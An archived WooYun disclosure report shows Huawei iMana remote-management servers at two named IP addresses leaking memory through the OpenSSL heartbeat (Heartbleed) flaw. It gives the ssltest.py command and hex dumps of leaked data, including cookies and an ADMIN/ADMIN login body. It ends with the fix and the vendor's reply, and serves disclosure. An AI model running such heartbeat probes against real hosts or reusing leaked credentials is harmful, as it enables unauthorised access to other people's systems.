乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-09: 细节已通知厂商并且等待厂商处理中 2015-04-14: 厂商已经确认,细节仅向厂商公开 2015-04-24: 细节向核心白帽子及相关领域专家公开 2015-05-04: 细节向普通白帽子公开 2015-05-14: 细节向实习白帽子公开 2015-05-29: 细节向公众公开
华为服务器远程管理 iMana存在信息泄露漏洞
华为服务器远程管理 iMana 存在openssl漏洞。测试(一)101.226.247.236
ssltest.py 101.226.247.236|moreConnecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 1961 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 12307Received heartbeat response: 0000: 02 30 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .0....SC[...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 74 3A 20 4D ....#.......t: M 00e0: 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 ozilla/5.0 (Wind 00f0: 6F 77 73 20 4E 54 20 36 2E 31 29 20 41 70 70 6C ows NT 6.1) Appl 0100: 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28 eWebKit/537.36 ( 0110: 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B KHTML, like Geck 0120: 6F 29 20 43 68 72 6F 6D 65 2F 34 31 2E 30 2E 32 o) Chrome/41.0.2 0130: 32 37 32 2E 31 31 38 20 53 61 66 61 72 69 2F 35 272.118 Safari/5 0140: 33 37 2E 33 36 0D 0A 52 65 66 65 72 65 72 3A 20 37.36..Referer: 0150: 68 74 74 70 73 3A 2F 2F 31 30 31 2E 32 32 36 2E https://101.226. 0160: 32 34 37 2E 32 33 36 2F 6C 6F 67 69 6E 2E 61 73 247.236/login.as 0170: 70 3F 6C 61 6E 67 3D 63 6E 26 6F 70 65 72 61 74 p?lang=cn&operat 0180: 65 3D 66 61 69 6C 0D 0A 41 63 63 65 70 74 2D 45 e=fail..Accept-E 0190: 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 ncoding: gzip, d 01a0: 65 66 6C 61 74 65 2C 20 73 64 63 68 0D 0A 41 63 eflate, sdch..Ac 01b0: 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A cept-Language: z 01c0: 68 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 0D 0A 43 h-CN,zh;q=0.8..C 01d0: 6F 6F 6B 69 65 3A 20 69 73 53 75 70 70 6F 72 74 ookie: isSupport 01e0: 43 6F 6F 6B 69 65 3D 48 75 61 77 65 69 2D 48 52 Cookie=Huawei-HR 01f0: 4D 43 0D 0A 0D 0A 6C B3 2F 11 EB A3 0B A8 A0 66 MC....l./......f 0200: 2E FE 79 22 E0 75 6E 67 75 61 67 65 3A 20 7A 68 ..y".unguage: zh 0210: 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 0D 0A 43 6F -CN,zh;q=0.8..Co 0220: 6F 6B 69 65 3A 20 69 73 53 75 70 70 6F 72 74 43 okie: isSupportC 0230: 6F 6F 6B 69 65 3D 48 75 61 77 65 69 2D 48 52 4D ookie=Huawei-HRM 0240: 43 3B 20 69 73 53 75 70 70 6F 72 74 43 6F 6F 6B C; isSupportCook 0250: 69 65 3D 48 75 61 77 65 69 2D 48 52 4D 43 0D 0A ie=Huawei-HRMC.. 0260: 0D 0A 6C 61 6E 67 3D 63 6E 26 55 73 65 72 4E 61 ..lang=cn&UserNa 0270: 6D 65 3D 41 44 4D 49 4E 26 50 61 73 73 77 6F 72 me=ADMIN&Passwor 0280: 64 3D 41 44 4D 49 4E 26 61 75 74 68 65 6E 74 69 d=ADMIN&authenti 0290: 63 61 74 65 54 79 70 65 3D 30 26 64 6F 6D 61 69 cateType=0&domai 02a0: 6E 3D 30 90 BA A6 22 8F 30 F4 F0 EF D1 77 6E 2B n=0...".0....wn+ 02b0: 11 E8 58 C0 AA C0 AB C0 AC C0 AD C0 AE C0 AF 01 ..X.............
测试(二)101.226.247.237
Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 1961 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 12307Received heartbeat response: 0000: 02 30 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .0....SC[...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 74 3A 20 4D ....#.......t: M 00e0: 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 ozilla/5.0 (Wind 00f0: 6F 77 73 20 4E 54 20 36 2E 31 29 20 41 70 70 6C ows NT 6.1) Appl 0100: 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28 eWebKit/537.36 ( 0110: 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B KHTML, like Geck 0120: 6F 29 20 43 68 72 6F 6D 65 2F 34 31 2E 30 2E 32 o) Chrome/41.0.2 0130: 32 37 32 2E 31 31 38 20 53 61 66 61 72 69 2F 35 272.118 Safari/5 0140: 33 37 2E 33 36 0D 0A 52 65 66 65 72 65 72 3A 20 37.36..Referer: 0150: 68 74 74 70 73 3A 2F 2F 31 30 31 2E 32 32 36 2E https://101.226. 0160: 32 34 37 2E 32 33 37 2F 6C 6F 67 69 6E 2E 61 73 247.237/login.as 0170: 70 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 p..Accept-Encodi 0180: 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 ng: gzip, deflat 0190: 65 2C 20 73 64 63 68 0D 0A 41 63 63 65 70 74 2D e, sdch..Accept- 01a0: 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D 43 4E 2C Language: zh-CN, 01b0: 7A 68 3B 71 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 zh;q=0.8..Cookie 01c0: 3A 20 69 73 53 75 70 70 6F 72 74 43 6F 6F 6B 69 : isSupportCooki 01d0: 65 3D 48 75 61 77 65 69 2D 48 52 4D 43 0D 0A 0D e=Huawei-HRMC... 01e0: 0A 88 8D 97 69 88 18 D6 E6 EE 4B F8 C1 6C A7 E7 ....i.....K..l.. 01f0: AE 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0200: 68 3B 71 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A h;q=0.8..Cookie: 0210: 20 69 73 53 75 70 70 6F 72 74 43 6F 6F 6B 69 65 isSupportCookie 0220: 3D 48 75 61 77 65 69 2D 48 52 4D 43 3B 20 69 73 =Huawei-HRMC; is 0230: 53 75 70 70 6F 72 74 43 6F 6F 6B 69 65 3D 48 75 SupportCookie=Hu 0240: 61 77 65 69 2D 48 52 4D 43 0D 0A 0D 0A 6C 61 6E awei-HRMC....lan 0250: 67 3D 63 6E 26 55 73 65 72 4E 61 6D 65 3D 41 44 g=cn&UserName=AD 0260: 4D 49 4E 26 50 61 73 73 77 6F 72 64 3D 41 44 4D MIN&Password=ADM 0270: 49 4E 26 61 75 74 68 65 6E 74 69 63 61 74 65 54 IN&authenticateT 0280: 79 70 65 3D 30 26 64 6F 6D 61 69 6E 3D 30 FC 75 ype=0&domain=0.u 0290: C9 63 64 47 0D CA 14 F2 62 A4 DD 72 99 E4 9F C0 .cdG....b..r.... 02a0: A0 C0 A1 C0 A2 C0 A3 C0 A4 C0 A5 C0 A6 C0 A7 C0 ................-- More --
https://101.226.247.236/login.asphttps://101.226.247.237/login.asp
升级openssl
危害等级:中
漏洞Rank:5
确认时间:2015-04-14 10:56
感谢提醒
2015-04-14:感谢白帽子对华为产品安全性的关注,华为已于2014年5月修复了该漏洞,并在华为PSIRT网站发布了SA。报告中被利用的服务器使用的历史版本,我们已经知会客户进行处理。